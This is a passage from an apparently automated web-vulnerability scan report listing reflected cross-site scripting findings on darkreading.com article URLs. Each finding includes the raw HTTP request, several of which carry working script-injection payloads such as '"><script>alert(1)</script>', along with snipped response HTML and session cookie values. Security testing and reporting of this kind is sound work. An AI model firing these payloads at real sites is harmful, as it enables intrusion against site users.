This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223100902/index.htmlce65a'><a>7efdb634037 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/223100902/index.htmlce65a'><a>7efdb634037'> ...[SNIP]...
3.493. http://www.darkreading.com/security/article/223100902/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223100902/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7be"><script>alert(1)</script>57d0bc08a4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223100902/index.html?ab7be"><script>alert(1)</script>57d0bc08a4e=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7e15a"><a>0d00b3f46d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article7e15a"><a>0d00b3f46d5/223800139/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7e81"><a>29c48682132 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/223800139e7e81"><a>29c48682132/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f8d2f'><a>deed5c4f771 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800139/index.htmlf8d2f'><a>deed5c4f771 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b7e8"><a>bd226ccaf3a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800139/index.html2b7e8"><a>bd226ccaf3a HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F223800139%2Findex.html2b7e8%22%3E%3Ca%3Ebd226ccaf3a&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/223800139/index.html2b7e8"><a>bd226ccaf3a"> ...[SNIP]...
3.498. http://www.darkreading.com/security/article/223800139/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223800139/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8963f"><script>alert(1)</script>83349dc4c3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223800139/index.html?8963f"><script>alert(1)</script>83349dc4c3d=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4ee23"><a>0324e848b10 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article4ee23"><a>0324e848b10/223800256/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1415e"><a>24f0a4cec06 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2238002561415e"><a>24f0a4cec06/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f7df"><a>0858b4fb196 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800256/index.html7f7df"><a>0858b4fb196 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bfb33'><a>c794812e479 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/223800256/index.htmlbfb33'><a>c794812e479 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Security ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/223800256/index.htmlbfb33'><a>c794812e479'> ...[SNIP]...
3.503. http://www.darkreading.com/security/article/223800256/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/223800256/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2901e"><script>alert(1)</script>203150ac5d4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/223800256/index.html?2901e"><script>alert(1)</script>203150ac5d4=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab2a5"><a>e197445a0c5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/articleab2a5"><a>e197445a0c5/224200523/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4782"><a>e09cbf33387 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224200523a4782"><a>e09cbf33387/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b023f'><a>06461d62d1f was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224200523/index.htmlb023f'><a>06461d62d1f HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8018"><a>df1a0994835 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224200523/index.htmld8018"><a>df1a0994835 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Tech Insi ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224200523%2Findex.htmld8018%22%3E%3Ca%3Edf1a0994835&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224200523/index.htmld8018"><a>df1a0994835"> ...[SNIP]...
3.508. http://www.darkreading.com/security/article/224200523/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224200523/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1a1b"><script>alert(1)</script>fa040d0d2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224200523/index.html?a1a1b"><script>alert(1)</script>fa040d0d2e=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94551"><a>4b58d9a3886 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article94551"><a>4b58d9a3886/224201355/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ffb78"><a>673a9b06038 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224201355ffb78"><a>673a9b06038/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 592a8"><a>c6d4cf8a460 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224201355/index.html592a8"><a>c6d4cf8a460 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 95e87'><a>f16c9ab406b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224201355/index.html95e87'><a>f16c9ab406b HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>N.J. Supr ...[SNIP]... <input type='hidden' name='article_url' value='http://www.darkreading.com/security/article/224201355/index.html95e87'><a>f16c9ab406b'> ...[SNIP]...
3.513. http://www.darkreading.com/security/article/224201355/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224201355/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e124c"><script>alert(1)</script>7dc74d8a677 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224201355/index.html?e124c"><script>alert(1)</script>7dc74d8a677=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f8c4"><a>a6cfa76bb5d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article8f8c4"><a>a6cfa76bb5d/224500077/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfe40"><a>72169a24de8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/224500077cfe40"><a>72169a24de8/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload adb79'><a>59624aa81bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224500077/index.htmladb79'><a>59624aa81bc HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 901ec"><a>6587cd9b73c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224500077/index.html901ec"><a>6587cd9b73c HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <html> <head> <title>Why Emplo ...[SNIP]... F%2Fwww.darkreading.com%2Fsecurity%2Farticle%2F224500077%2Findex.html901ec%22%3E%3Ca%3E6587cd9b73c&siteId=300001&successfulLoginRedirect=http://www.darkreading.com/security/article/224500077/index.html901ec"><a>6587cd9b73c"> ...[SNIP]...
3.518. http://www.darkreading.com/security/article/224500077/index.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.darkreading.com
Path:
/security/article/224500077/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 11601"><script>alert(1)</script>c58b41d8f8c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /security/article/224500077/index.html?11601"><script>alert(1)</script>c58b41d8f8c=1 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12f17"><a>c1a5564ba59 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article12f17"><a>c1a5564ba59/224600304/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e1d0"><a>79ea45d8006 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /security/article/2246003044e1d0"><a>79ea45d8006/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f7329'><a>584510cc553 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /security/article/224600304/index.htmlf7329'><a>584510cc553 HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91419"><a>1b75f9d5df4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
